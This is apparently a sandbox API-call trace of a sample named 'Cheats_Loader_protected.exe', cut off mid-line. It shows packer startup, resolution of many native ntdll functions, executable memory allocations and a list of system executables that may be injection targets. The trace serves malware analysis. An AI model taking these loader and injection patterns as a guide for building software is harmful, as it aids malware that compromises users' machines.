0x741e0000 [0047.657] GetProcAddress (hModule=0x741e0000, lpProcName="InitializeFlatSB") returned 0x741fabf0 [0047.657] GetProcAddress (hModule=0x741e0000, lpProcName="UninitializeFlatSB") returned 0x741faaa0 [0047.657] GetProcAddress (hModule=0x741e0000, lpProcName="FlatSB_GetScrollProp") returned 0x741fc720 [0047.657] GetProcAddress (hModule=0x741e0000, lpProcName="FlatSB_SetScrollProp") returned 0x741fd980 [0047.657] GetProcAddress (hModule=0x741e0000, lpProcName="FlatSB_EnableScrollBar") returned 0x741fcc50 [0047.657] GetProcAddress (hModule=0x741e0000, lpProcName="FlatSB_ShowScrollBar") returned 0x741fca10 [0047.658] GetProcAddress (hModule=0x741e0000, lpProcName="FlatSB_GetScrollRange") returned 0x741fc890 [0047.658] GetProcAddress (hModule=0x741e0000, lpProcName="FlatSB_GetScrollInfo") returned 0x741fc920 [0047.658] GetProcAddress (hModule=0x741e0000, lpProcName="FlatSB_GetScrollPos") returned 0x741fc6c0 [0047.658] GetProcAddress (hModule=0x741e0000, lpProcName="FlatSB_SetScrollPos") returned 0x741fd730 [0047.658] GetProcAddress (hModule=0x741e0000, lpProcName="FlatSB_SetScrollInfo") returned 0x741fd8b0 [0047.658] GetProcAddress (hModule=0x741e0000, lpProcName="FlatSB_SetScrollRange") returned 0x741fd7c0 [0047.718] GetModuleHandleA (lpModuleName="User32.dll") returned 0x750c0000 [0047.718] GetProcAddress (hModule=0x750c0000, lpProcName="SetLayeredWindowAttributes") returned 0x750f3d70 [0047.718] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc08a [0047.949] GetVersion () returned 0x23f00206 [0047.966] GetCurrentProcessId () returned 0x13d8 [0048.001] GlobalAddAtomA (lpString="EnigmaDelphi000013D8") returned 0xc0cd [0048.145] GetCurrentThreadId () returned 0x13dc [0048.145] GlobalAddAtomA (lpString="EnigmaControlOfs00A90000000013DC") returned 0xc0cb [0048.145] RegisterClipboardFormatA (lpszFormat="ControlOfs00A90000000013DC") returned 0xc199 [0048.145] GetProcAddress (hModule=0x750c0000, lpProcName="GetMonitorInfoA") returned 0x750edf30 [0048.145] GetProcAddress (hModule=0x750c0000, lpProcName="GetSystemMetrics") returned 0x750eddc0 [0048.145] GetSystemMetrics (nIndex=19) returned 1 [0048.710] GetSystemMetrics (nIndex=75) returned 1 [0048.710] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0xe21870, fWinIni=0x0 | out: pvParam=0xe21870) returned 1 [0048.795] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0048.932] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0048.932] LoadCursorA (hInstance=0xa90000, lpCursorName=0x7ff9) returned 0x0 [0048.932] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b [0048.932] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019 [0048.933] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017 [0048.933] LoadCursorA (hInstance=0xa90000, lpCursorName=0x7ffa) returned 0x0 [0048.933] LoadCursorA (hInstance=0xa90000, lpCursorName=0x7ffb) returned 0x0 [0048.933] LoadCursorA (hInstance=0xa90000, lpCursorName=0x7ffc) returned 0x0 [0048.933] LoadCursorA (hInstance=0xa90000, lpCursorName=0x7ffd) returned 0x0 [0048.933] LoadCursorA (hInstance=0xa90000, lpCursorName=0x7fff) returned 0x0 [0048.933] LoadCursorA (hInstance=0xa90000, lpCursorName=0x7ffe) returned 0x0 [0048.933] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0048.933] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b [0048.933] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011 [0048.933] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d [0048.933] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013 [0048.933] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f [0048.933] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0048.933] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005 [0048.934] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009 [0048.934] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0048.934] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0048.934] ReleaseDC (hWnd=0x0, hDC=0x10105d6) returned 1 [0048.934] GetProcAddress (hModule=0x750c0000, lpProcName="EnumDisplayMonitors") returned 0x750f32e0 [0048.934] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0xb27974, dwData=0xe21abc) returned 1 [0048.954] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x13ffd93, fWinIni=0x0 | out: pvParam=0x13ffd93) returned 1 [0049.093] CreateFontIndirectA (lplf=0x13ffd93) returned 0xa10a0537 [0049.113] GetObjectA (in: h=0xa10a0537, c=60, pv=0x13ffb84 | out: pv=0x13ffb84) returned 60 [0049.113] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x13ffc3f, fWinIni=0x0 | out: pvParam=0x13ffc3f) returned 1 [0049.117] CreateFontIndirectA (lplf=0x13ffd1b) returned 0x2c0a066f [0049.117] GetObjectA (in: h=0x2c0a066f, c=60, pv=0x13ffb84 | out: pv=0x13ffb84) returned 60 [0049.117] CreateFontIndirectA (lplf=0x13ffcdf) returned 0x1c0a01a2 [0049.117] GetObjectA (in: h=0x1c0a01a2, c=60, pv=0x13ffb84 | out: pv=0x13ffb84) returned 60 [0049.191] LoadIconA (hInstance=0x0, lpIconName="MAINICON") returned 0x0 [0049.317] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x13ffcf3, nSize=0x100 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe")) returned 0x33 [0049.318] OemToCharA (in: pSrc="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", pDst=0x13ffcf3 | out: pDst="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe") returned 1 [0049.509] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x920000 [0049.695] GetKeyboardLayoutList (in: nBuff=64, lpList=0x13ffc74 | out: lpList=0x13ffc74) returned 1 [0050.029] GetModuleHandleA (lpModuleName="USER32") returned 0x750c0000 [0050.029] GetProcAddress (hModule=0x750c0000, lpProcName="AnimateWindow") returned 0x750d7000 [0050.103] SysReAllocStringLen (in: pbstr=0xbd1288*=0x0, psz="Help", len=0x4 | out: pbstr=0xbd1288*="Help") returned 1 [0050.103] SysReAllocStringLen (in: pbstr=0xbd1284*=0x0, psz="YesToAll", len=0x8 | out: pbstr=0xbd1284*="YesToAll") returned 1 [0050.103] SysReAllocStringLen (in: pbstr=0xbd1280*=0x0, psz="NoToAll", len=0x7 | out: pbstr=0xbd1280*="NoToAll") returned 1 [0050.103] SysReAllocStringLen (in: pbstr=0xbd127c*=0x0, psz="All", len=0x3 | out: pbstr=0xbd127c*="All") returned 1 [0050.103] SysReAllocStringLen (in: pbstr=0xbd1278*=0x0, psz="Ignore", len=0x6 | out: pbstr=0xbd1278*="Ignore") returned 1 [0050.103] SysReAllocStringLen (in: pbstr=0xbd1274*=0x0, psz="Retry", len=0x5 | out: pbstr=0xbd1274*="Retry") returned 1 [0050.103] SysReAllocStringLen (in: pbstr=0xbd1270*=0x0, psz="Abort", len=0x5 | out: pbstr=0xbd1270*="Abort") returned 1 [0050.103] SysReAllocStringLen (in: pbstr=0xbd126c*=0x0, psz="Cancel", len=0x6 | out: pbstr=0xbd126c*="Cancel") returned 1 [0050.103] SysReAllocStringLen (in: pbstr=0xbd1268*=0x0, psz="OK", len=0x2 | out: pbstr=0xbd1268*="OK") returned 1 [0050.104] SysReAllocStringLen (in: pbstr=0xbd1264*=0x0, psz="No", len=0x2 | out: pbstr=0xbd1264*="No") returned 1 [0050.104] SysReAllocStringLen (in: pbstr=0xbd1260*=0x0, psz="Yes", len=0x3 | out: pbstr=0xbd1260*="Yes") returned 1 [0050.161] GetTickCount () returned 0x114e262 [0050.161] GetTickCount () returned 0x114e262 [0050.161] GetCurrentThreadId () returned 0x13dc [0050.178] SetWindowsHookExW (idHook=3, lpfn=0xb50ad0, hmod=0x0, dwThreadId=0x13dc) returned 0xf00df [0050.343] RegisterClipboardFormatA (lpszFormat="TntUnicodeVcl.DestroyWindow") returned 0xc19a [0050.465] VirtualQuery (in: lpAddress=0xb38694, lpBuffer=0x13ffdd0, dwLength=0x1c | out: lpBuffer=0x13ffdd0*(BaseAddress=0xb38000, AllocationBase=0xa90000, AllocationProtect=0x80, RegionSize=0x1f3000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0050.465] GetCurrentProcessId () returned 0x13d8 [0050.483] GetCurrentThreadId () returned 0x13dc [0050.483] GlobalAddAtomA (lpString="EnigmaDelphi000013D8") returned 0xc0cd [0050.644] GlobalAddAtomA (lpString="EnigmaControlOfs00A90000000013DC") returned 0xc0cb [0051.044] LoadCursorA (hInstance=0x0, lpCursorName=0x7f89) returned 0x1001f [0051.168] DestroyCursor (hCursor=0x0) returned 0 [0051.168] QueryPerformanceCounter (in: lpPerformanceCount=0x13ffe38 | out: lpPerformanceCount=0x13ffe38*=14692391147) returned 1 [0051.218] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x200 [0051.218] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x20c [0051.410] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0051.410] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0xa10000 [0051.564] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0051.565] GetProcAddress (hModule=0x772d0000, lpProcName="GetProcAddress") returned 0x772e51b0 [0051.565] GetProcAddress (hModule=0x77970000, lpProcName="ZwClose") returned 0x779e1de0 [0051.565] GetProcAddress (hModule=0x77970000, lpProcName="ZwCreateFile") returned 0x779e2260 [0051.565] GetProcAddress (hModule=0x77970000, lpProcName="ZwOpenFile") returned 0x779e2040 [0051.565] GetProcAddress (hModule=0x77970000, lpProcName="ZwCreateSection") returned 0x779e21b0 [0051.565] GetProcAddress (hModule=0x77970000, lpProcName="ZwMapViewOfSection") returned 0x779e1f90 [0051.565] GetProcAddress (hModule=0x77970000, lpProcName="ZwUnmapViewOfSection") returned 0x779e1fb0 [0051.565] GetProcAddress (hModule=0x77970000, lpProcName="ZwUnmapViewOfSectionEx") returned 0x779e38f0 [0051.566] GetProcAddress (hModule=0x77970000, lpProcName="ZwReadFile") returned 0x779e1d50 [0051.566] GetProcAddress (hModule=0x77970000, lpProcName="ZwQueryInformationFile") returned 0x779e1e00 [0051.566] GetProcAddress (hModule=0x77970000, lpProcName="ZwSetInformationFile") returned 0x779e1f80 [0051.566] GetProcAddress (hModule=0x77970000, lpProcName="ZwQueryAttributesFile") returned 0x779e20e0 [0051.566] GetProcAddress (hModule=0x77970000, lpProcName="ZwQuerySection") returned 0x779e2220 [0051.566] GetProcAddress (hModule=0x77970000, lpProcName="ZwQueryFullAttributesFile") returned 0x779e30a0 [0051.566] GetProcAddress (hModule=0x77970000, lpProcName="ZwWriteFile") returned 0x779e1d70 [0051.566] GetProcAddress (hModule=0x77970000, lpProcName="ZwDeviceIoControlFile") returned 0x779e1d60 [0051.566] GetProcAddress (hModule=0x77970000, lpProcName="ZwQueryObject") returned 0x779e1df0 [0051.566] GetProcAddress (hModule=0x77970000, lpProcName="ZwQueryDirectoryFile") returned 0x779e2060 [0051.567] GetProcAddress (hModule=0x77970000, lpProcName="ZwQueryDirectoryFileEx") returned 0x0 [0051.567] GetProcAddress (hModule=0x77970000, lpProcName="ZwOpenSection") returned 0x779e2080 [0051.567] GetProcAddress (hModule=0x77970000, lpProcName="ZwDuplicateObject") returned 0x779e20d0 [0051.567] GetProcAddress (hModule=0x77970000, lpProcName="ZwDeleteFile") returned 0x779e29b0 [0051.567] GetProcAddress (hModule=0x77970000, lpProcName="ZwLockFile") returned 0x779e2d30 [0051.567] GetProcAddress (hModule=0x77970000, lpProcName="ZwUnlockFile") returned 0x779e38d0 [0051.567] GetProcAddress (hModule=0x77970000, lpProcName="ZwTerminateProcess") returned 0x779e1fd0 [0051.567] GetProcAddress (hModule=0x77970000, lpProcName="ZwQueryVolumeInformationFile") returned 0x779e21a0 [0051.567] GetProcAddress (hModule=0x77970000, lpProcName="ZwSetVolumeInformationFile") returned 0x779e3760 [0051.567] GetProcAddress (hModule=0x77970000, lpProcName="ZwAccessCheck") returned 0x779e1cf0 [0051.568] GetProcAddress (hModule=0x77970000, lpProcName="ZwExtendSection") returned 0x779e2aa0 [0051.568] GetProcAddress (hModule=0x77970000, lpProcName="ZwFlushBuffersFile") returned 0x779e21c0 [0051.568] GetProcAddress (hModule=0x77970000, lpProcName="ZwFsControlFile") returned 0x779e20a0 [0051.568] GetProcAddress (hModule=0x77970000, lpProcName="ZwNotifyChangeDirectoryFile") returned 0x779e2de0 [0051.568] GetProcAddress (hModule=0x77970000, lpProcName="ZwQuerySecurityObject") returned 0x779e31f0 [0051.568] GetProcAddress (hModule=0x77970000, lpProcName="ZwSetSecurityObject") returned 0x779e36b0 [0051.568] GetProcAddress (hModule=0x77970000, lpProcName="ZwCreateProcess") returned 0x779e2830 [0051.568] GetProcAddress (hModule=0x77970000, lpProcName="ZwCreateProcessEx") returned 0x779e21e0 [0051.568] GetProcAddress (hModule=0x77970000, lpProcName="ZwCreateUserProcess") returned 0x779e2910 [0051.568] GetProcAddress (hModule=0x77970000, lpProcName="ZwResumeThread") returned 0x779e2230 [0051.569] GetProcAddress (hModule=0x77970000, lpProcName="ZwCreateThread") returned 0x779e21f0 [0051.569] GetProcAddress (hModule=0x77970000, lpProcName="ZwQueryInformationProcess") returned 0x779e1e80 [0051.569] GetProcAddress (hModule=0x77970000, lpProcName="ZwOpenKey") returned 0x779e1e10 [0051.569] GetProcAddress (hModule=0x77970000, lpProcName="ZwOpenKeyEx") returned 0x779e2e60 [0051.569] GetProcAddress (hModule=0x77970000, lpProcName="ZwEnumerateValueKey") returned 0x779e1e20 [0051.569] GetProcAddress (hModule=0x77970000, lpProcName="ZwQueryKey") returned 0x779e1e50 [0051.569] GetProcAddress (hModule=0x77970000, lpProcName="ZwQueryValueKey") returned 0x779e1e60 [0051.569] GetProcAddress (hModule=0x77970000, lpProcName="ZwCreateKey") returned 0x779e1ee0 [0051.569] GetProcAddress (hModule=0x77970000, lpProcName="ZwEnumerateKey") returned 0x779e2030 [0051.570] GetProcAddress (hModule=0x77970000, lpProcName="ZwSetValueKey") returned 0x779e2310 [0051.570] GetProcAddress (hModule=0x77970000, lpProcName="ZwDeleteKey") returned 0x779e29c0 [0051.570] GetProcAddress (hModule=0x77970000, lpProcName="ZwDeleteValueKey") returned 0x779e29f0 [0051.570] GetProcAddress (hModule=0x77970000, lpProcName="ZwFlushKey") returned 0x779e2b10 [0051.570] GetProcAddress (hModule=0x77970000, lpProcName="ZwLoadKey") returned 0x779e2d00 [0051.570] GetProcAddress (hModule=0x77970000, lpProcName="ZwLoadKey2") returned 0x779e2d10 [0051.570] GetProcAddress (hModule=0x77970000, lpProcName="ZwNotifyChangeKey") returned 0x779e2df0 [0051.570] GetProcAddress (hModule=0x77970000, lpProcName="ZwQueryMultipleValueKey") returned 0x779e3180 [0051.570] GetProcAddress (hModule=0x77970000, lpProcName="ZwReplaceKey") returned 0x779e3380 [0051.570] GetProcAddress (hModule=0x77970000, lpProcName="ZwRestoreKey") returned 0x779e33e0 [0051.571] GetProcAddress (hModule=0x77970000, lpProcName="ZwSaveKey") returned 0x779e3460 [0051.571] GetProcAddress (hModule=0x77970000, lpProcName="ZwSetInformationKey") returned 0x779e35c0 [0051.571] GetProcAddress (hModule=0x77970000, lpProcName="ZwUnloadKey") returned 0x779e38a0 [0051.571] VirtualFree (lpAddress=0xa10000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0051.673] SysReAllocStringLen (in: pbstr=0xbd1774*=0x0, psz="tcpsvcs.exe", len=0xb | out: pbstr=0xbd1774*="tcpsvcs.exe") returned 1 [0051.673] SysReAllocStringLen (in: pbstr=0xbd1770*=0x0, psz="ntvdm.exe", len=0x9 | out: pbstr=0xbd1770*="ntvdm.exe") returned 1 [0051.673] SysReAllocStringLen (in: pbstr=0xbd176c*=0x0, psz="dllhost.exe", len=0xb | out: pbstr=0xbd176c*="dllhost.exe") returned 1 [0051.673] SysReAllocStringLen (in: pbstr=0xbd1768*=0x0, psz="replace.exe", len=0xb | out: pbstr=0xbd1768*="replace.exe") returned 1 [0051.673] SysReAllocStringLen (in: pbstr=0xbd1764*=0x0, psz="regsvr32.exe", len=0xc | out: pbstr=0xbd1764*="regsvr32.exe") returned 1 [0051.673] SysReAllocStringLen (in: pbstr=0xbd1760*=0x0, psz="winver.exe", len=0xa | out: pbstr=0xbd1760*="winver.exe") returned 1 [0051.673] SysReAllocStringLen (in: pbstr=0xbd175c*=0x0, psz="help.exe", len=0x8 | out: pbstr=0xbd175c*="help.exe") returned 1 [0051.673] SysReAllocStringLen (in: pbstr=0xbd1758*=0x0, psz="find.exe", len=0x8 | out: pbstr=0xbd1758*="find.exe") returned 1 [0051.673] SysReAllocStringLen (in: pbstr=0xbd1754*=0x0, psz="compact.exe", len=0xb | out: pbstr=0xbd1754*="compact.exe") returned 1 [0051.673] SysReAllocStringLen (in: pbstr=0xbd1750*=0x0, psz="chkdsk.exe", len=0xa | out: pbstr=0xbd1750*="chkdsk.exe") returned 1 [0051.673] SysReAllocStringLen (in: pbstr=0xbd174c*=0x0, psz="attrib.exe", len=0xa | out: pbstr=0xbd174c*="attrib.exe") returned 1 [0051.673] SysReAllocStringLen (in: pbstr=0xbd1748*=0x0, psz="write.exe", len=0x9 | out: pbstr=0xbd1748*="write.exe") returned 1 [0051.673] SysReAllocStringLen (in: pbstr=0xbd1744*=0x0, psz="hh.exe", len=0x6 | out: pbstr=0xbd1744*="hh.exe") returned 1 [0051.673] QueryPerformanceCounter (in: lpPerformanceCount=0x13ffe38 | out: lpPerformanceCount=0x13ffe38*=14755574283) returned 1 [0051.859] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0051.859] GetProcAddress (hModule=0x772d0000, lpProcName="GetModuleHandleA") returned 0x772e50b0 [0051.860] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0051.860] GetProcAddress (hModule=0x772d0000, lpProcName="GetModuleHandleW") returned 0x772e50d0 [0051.860] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0051.860] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileA") returned 0x7733ed00 [0051.860] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0051.860] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0051.860] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0051.860] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileMappingA") returned 0x7731db60 [0051.860] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0051.861] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileMappingW") returned 0x772e44b0 [0051.861] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0051.861] GetProcAddress (hModule=0x772d0000, lpProcName="ReadFile") returned 0x7733f090 [0051.861] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0051.861] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0051.861] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0051.861] GetProcAddress (hModule=0x772d0000, lpProcName="GetFileSize") returned 0x7733ef30 [0051.861] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0051.861] GetProcAddress (hModule=0x772d0000, lpProcName="SetFilePointer") returned 0x7733f120 [0051.861] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0051.862] GetProcAddress (hModule=0x772d0000, lpProcName="MapViewOfFile") returned 0x772e5be0 [0051.862] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0051.862] GetProcAddress (hModule=0x772d0000, lpProcName="MapViewOfFileEx") returned 0x772e5c00 [0051.862] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0051.862] GetProcAddress (hModule=0x772d0000, lpProcName="UnmapViewOfFile") returned 0x772e68f0 [0051.862] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0051.862] GetProcAddress (hModule=0x772d0000, lpProcName="LoadLibraryA") returned 0x772e5a80 [0051.862] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0051.862] GetProcAddress (hModule=0x772d0000, lpProcName="LoadLibraryExA") returned 0x772e5aa0 [0051.863] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0051.863] GetProcAddress (hModule=0x772d0000, lpProcName="LoadLibraryW") returned 0x772e5ae0 [0051.863] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0051.863] GetProcAddress (hModule=0x772d0000, lpProcName="LoadLibraryExW") returned 0x772e5ac0 [0051.863] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0051.863] GetProcAddress (hModule=0x772d0000, lpProcName="FreeLibrary") returned 0x772e4c40 [0051.863] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0051.863] GetProcAddress (hModule=0x772d0000, lpProcName="FreeResource") returned 0x772e4c80 [0051.863] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0051.863] GetProcAddress (hModule=0x772d0000, lpProcName="GetVersion") returned 0x772e56c0 [0051.864] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0051.864] GetProcAddress (hModule=0x772d0000, lpProcName="GetCurrentProcessId") returned 0x7733ea20 [0051.864] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0051.864] GetProcAddress (hModule=0x772d0000, lpProcName="GetCurrentProcess") returned 0x7733ea10 [0051.864] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0051.864] GetProcAddress (hModule=0x772d0000, lpProcName="GetCommandLineA") returned 0x772e4cb0 [0051.864] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0051.864] GetProcAddress (hModule=0x772d0000, lpProcName="GetCommandLineW") returned 0x772e4cc0 [0051.864] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0051.864] GetProcAddress (hModule=0x772d0000, lpProcName="LockResource") returned 0x772e5bc0 [0051.865] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0051.865] GetProcAddress (hModule=0x772d0000, lpProcName="GetProcAddress") returned 0x772e51b0 [0051.865] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0051.865] GetProcAddress (hModule=0x772d0000, lpProcName="UnhandledExceptionFilter") returned 0x772e68d0 [0051.865] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0051.865] GetProcAddress (hModule=0x772d0000, lpProcName="DebugBreak") returned 0x772e4750 [0051.865] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0051.865] GetProcAddress (hModule=0x772d0000, lpProcName="FatalAppExitA") returned 0x772e6fe0 [0051.865] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0051.865] GetProcAddress (hModule=0x772d0000, lpProcName="RtlRaiseException") returned 0x0 [0051.866] GetModuleHandleA (lpModuleName="user32.dll") returned 0x750c0000 [0051.866] GetProcAddress (hModule=0x750c0000, lpProcName="SetWindowsHookExA") returned 0x750e2730 [0051.866] GetModuleHandleA (lpModuleName="user32.dll") returned 0x750c0000 [0051.866] GetProcAddress (hModule=0x750c0000, lpProcName="SetWindowsHookExW") returned 0x750f0e70 [0051.866] GetModuleHandleA (lpModuleName="user32.dll") returned 0x750c0000 [0051.866] GetProcAddress (hModule=0x750c0000, lpProcName="UnhookWindowsHookEx") returned 0x750f3fa0 [0051.866] GetModuleHandleA (lpModuleName="user32.dll") returned 0x750c0000 [0051.866] GetProcAddress (hModule=0x750c0000, lpProcName="PeekMessageA") returned 0x750d87a0 [0051.866] GetModuleHandleA (lpModuleName="user32.dll") returned 0x750c0000 [0051.867] GetProcAddress (hModule=0x750c0000, lpProcName="CallNextHookEx") returned 0x750eda00 [0052.205] HeapCreate (flOptions=0x0, dwInitialSize=0x88000, dwMaximumSize=0x88000) returned 0x2a10000 [0052.352] RtlAllocateHeap (HeapHandle=0x2a10000, Flags=0x0, Size=0x10000) returned 0x2a104a0 [0052.353] RtlAllocateHeap (HeapHandle=0x2a10000, Flags=0x0, Size=0x10000) returned 0x2a204a8 [0052.353] RtlAllocateHeap (HeapHandle=0x2a10000, Flags=0x0, Size=0x10000) returned 0x2a304b0 [0052.353] RtlAllocateHeap (HeapHandle=0x2a10000, Flags=0x0, Size=0x10000) returned 0x2a404b8 [0052.353] RtlAllocateHeap (HeapHandle=0x2a10000, Flags=0x0, Size=0x10000) returned 0x2a504c0 [0052.353] RtlAllocateHeap (HeapHandle=0x2a10000, Flags=0x0, Size=0x10000) returned 0x2a604c8 [0052.353] RtlAllocateHeap (HeapHandle=0x2a10000, Flags=0x0, Size=0x10000) returned 0x2a704d0 [0052.353] RtlAllocateHeap (HeapHandle=0x2a10000, Flags=0x0, Size=0x10000) returned 0x2a804d8 [0052.440] ReleaseDC (hWnd=0x0, hDC=0x10105d6) returned 1 [0052.440] LoadStringA (in: hInstance=0xa9a000, uID=0xfeea, lpBuffer=0x13ffa1c, cchBufferMax=1024 | out: lpBuffer="JPEG Image File") returned 0xf [0052.440] LoadStringA (in: hInstance=0xa9a000, uID=0xff43, lpBuffer=0x13ff9bc, cchBufferMax=1024 | out: lpBuffer="Metafiles") returned 0x9 [0052.440] CharLowerBuffA (in: lpsz="wmf", cchLength=0x3 | out: lpsz="wmf") returned 0x3 [0052.441] LoadStringA (in: hInstance=0xa9a000, uID=0xff44, lpBuffer=0x13ff9bc, cchBufferMax=1024 | out: lpBuffer="Enhanced Metafiles") returned 0x12 [0052.441] CharLowerBuffA (in: lpsz="emf", cchLength=0x3 | out: lpsz="emf") returned 0x3 [0052.441] LoadStringA (in: hInstance=0xa9a000, uID=0xff45, lpBuffer=0x13ff9bc, cchBufferMax=1024 | out: lpBuffer="Icons") returned 0x5 [0052.441] CharLowerBuffA (in: lpsz="ico", cchLength=0x3 | out: lpsz="ico") returned 0x3 [0052.441] LoadStringA (in: hInstance=0xa9a000, uID=0xff46, lpBuffer=0x13ff9bc, cchBufferMax=1024 | out: lpBuffer="Bitmaps") returned 0x7 [0052.441] CharLowerBuffA (in: lpsz="bmp", cchLength=0x3 | out: lpsz="bmp") returned 0x3 [0052.441] CharLowerBuffA (in: lpsz="jpeg", cchLength=0x4 | out: lpsz="jpeg") returned 0x4 [0052.441] LoadStringA (in: hInstance=0xa9a000, uID=0xfeea, lpBuffer=0x13ffa1c, cchBufferMax=1024 | out: lpBuffer="JPEG Image File") returned 0xf [0052.441] CharLowerBuffA (in: lpsz="jpg", cchLength=0x3 | out: lpsz="jpg") returned 0x3 [0052.443] CharLowerBuffA (in: lpsz="PNG", cchLength=0x3 | out: lpsz="png") returned 0x3 [0052.443] VirtualAlloc (lpAddress=0xe24000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x40) returned 0xe24000 [0052.445] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0052.445] GetProcAddress (hModule=0x772d0000, lpProcName="GetVersionExA") returned 0x772e56d0 [0052.445] GetVersionExA (in: lpVersionInformation=0x13ffbc8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x13ffbe4, dwMinorVersion=0x4, dwBuildNumber=0xa9bd7e, dwPlatformId=0x13ffc0c, szCSDVersion="") | out: lpVersionInformation=0x13ffbc8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0052.445] GetModuleFileNameW (in: hModule=0xa90000, lpFilename=0x6ce34, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe")) returned 0x33 [0052.445] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", nBufferLength=0x104, lpBuffer=0x13ffa50, lpFilePart=0x13ffa4c | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", lpFilePart=0x13ffa4c*="Cheats_Loader_protected.exe") returned 0x33 [0052.445] SysReAllocStringLen (in: pbstr=0xe2289c*=0x0, psz="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", len=0x33 | out: pbstr=0xe2289c*="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe") returned 1 [0052.445] SysReAllocStringLen (in: pbstr=0x13ffd34*=0x0, 